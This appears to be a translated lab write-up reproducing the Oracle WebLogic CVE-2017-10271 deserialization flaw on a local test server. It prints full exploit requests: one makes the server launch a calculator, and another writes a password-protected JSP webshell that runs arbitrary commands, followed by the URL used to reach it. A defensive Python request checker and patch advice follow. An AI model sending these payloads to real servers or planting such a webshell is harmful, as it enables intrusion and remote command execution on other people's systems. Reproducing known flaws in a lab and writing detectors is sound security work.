I had already reproduced this once before, but the data was lost afterwards, so I have to do it all over again.
I could not find a way to install it from the command line on Linux, so I just installed it on Windows instead.
12.2.1.2.0 download:
On Windows the installer must be run as Administrator, otherwise the following error appears:
Run as Administrator:
Finally, start the Admin Server:
Check the listening network ports:
Then the exploit did not succeed.
https://www.exploit-db.com/exploits/43458/
It may be because of Java 8, but switching Java versions is rather troublesome.
In the end I finally found where JAVA_HOME is set: user_projects\domains\base_domain\bin\setDomainEnv.cmd
However, when running WebLogic it complained that Java versions below 8 are not supported.
Then I put the request into Burp to have a look, changed it to a Windows payload, and still got 404 Not Found. Could it be that Oracle has already removed the affected component from this version?
10.3.6.0 download:
https://download.oracle.com/otn/nt/middleware/11g/wls/1036/wls1036_generic.jar
The installation looks roughly like this:
This time /wls-wsat/CoordinatorPortType is finally accessible:
PoC:
https://www.exploit-db.com/exploits/43458/
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 539

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1" >
<void index="0">
<string>calc</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Pop a calculator:
Write a webshell (https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271):
Request:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 920

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[<% if("cqq".equals(request.getParameter("password"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
} %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
It can then be reached with a plain HTTP request:
http://127.0.0.1:7001/bea_wls_internal/test.jsp?password=cqq&command=tasklist
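As a defender-side complement to the two requests above (an added example, not part of the original post and not code from exploit-db or the iBearcat repository): a small Python checker that inspects a raw HTTP request for the pattern both payloads share, namely an XMLDecoder `<java>` document carried inside the `WorkContext` SOAP header, which then instantiates classes such as `java.lang.ProcessBuilder` or `java.io.PrintWriter` and calls methods on them. It assumes nothing about WebLogic beyond the namespace and path used in the PoC; the class and method watch-lists and the three sample requests (the calc PoC, a benign WS-AT call, and a deliberately broken one) are constructed here.

```python
import re
import xml.etree.ElementTree as ET

# Namespace of the WorkContext header that the PoC above abuses
WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
WORKCONTEXT_TAG = "{%s}WorkContext" % WORKAREA_NS

# Classes a legitimate WorkContext header never needs to instantiate
# (constructed watch-list; extend it for your environment)
SUSPICIOUS_CLASSES = {
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",
    "java.beans.XMLDecoder",
    "java.io.PrintWriter",
    "java.io.FileOutputStream",
}
# Method names that mean "do something", not "describe a context"
SUSPICIOUS_METHODS = {"start", "exec", "println", "print", "write"}


def parse_request(raw):
    """Split a raw HTTP request into (method, path, body)."""
    text = raw.replace("\r\n", "\n").lstrip("\n")
    head, _, body = text.partition("\n\n")
    request_line = head.split("\n", 1)[0]
    parts = request_line.split()
    if len(parts) < 2:
        raise ValueError("malformed request line: %r" % request_line)
    return parts[0], parts[1], body


def analyze_request(raw):
    """Return a list of human-readable findings for one HTTP request."""
    method, path, body = parse_request(raw)
    findings = []
    if path.startswith("/wls-wsat/"):
        findings.append("targets the wls-wsat component (%s %s)" % (method, path))
    if not body.strip():
        return findings
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        # Broken XML still reaches the server, so fall back to a text scan
        if re.search(r"<\w*:?WorkContext\b", body) and re.search(r"<java\b", body):
            findings.append("unparseable body still carries WorkContext with a <java> element")
        return findings
    for wc in root.iter(WORKCONTEXT_TAG):
        for elem in wc.iter():
            if elem.tag == "java":
                findings.append("WorkContext header contains an XMLDecoder <java> element")
            cls = elem.get("class")
            if cls in SUSPICIOUS_CLASSES:
                findings.append("instantiates %s inside WorkContext" % cls)
            meth = elem.get("method")
            if meth in SUSPICIOUS_METHODS:
                findings.append("invokes method %r inside WorkContext" % meth)
    return findings


def is_exploit_attempt(raw):
    """True when the request shows XMLDecoder abuse, not merely a wls-wsat path."""
    return any("WorkContext" in f for f in analyze_request(raw))


# Constructed samples: the calc PoC shape from the page, a benign WS-AT call,
# and a truncated request whose XML does not parse
CALC_POC = (
    "POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\n"
    "Host: 127.0.0.1:7001\r\n"
    "Content-Type: text/xml;charset=UTF-8\r\n"
    "\r\n"
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Header>"
    '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
    '<java><object class="java.lang.ProcessBuilder">'
    '<array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array>'
    '<void method="start"/></object></java>'
    "</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"
)
BENIGN = (
    "POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\n"
    "Host: 127.0.0.1:7001\r\n"
    "Content-Type: text/xml;charset=UTF-8\r\n"
    "\r\n"
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Header/><soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>"
)
BROKEN = (
    "POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\n\r\n"
    '<soapenv:Envelope><soapenv:Header><work:WorkContext><java><object class="java.lang.ProcessBuilder">'
)

if __name__ == "__main__":
    for name, sample in (("calc PoC", CALC_POC), ("benign", BENIGN), ("broken", BROKEN)):
        print(name, "->", "EXPLOIT" if is_exploit_attempt(sample) else "ok")
        for finding in analyze_request(sample):
            print("   ", finding)
```

This belongs in front of the server (a reverse-proxy or WAF hook) or over captured request bodies; the access log alone is not enough, because the payload lives in the POST body and the path looks like ordinary WS-AT traffic. Note that the benign call produces only the informational path finding, so alerting should key on the `WorkContext` findings rather than on the path. The real fix for CVE-2017-10271 is Oracle's October 2017 Critical Patch Update; removing the wls-wsat.war component and restarting the server was the documented interim workaround.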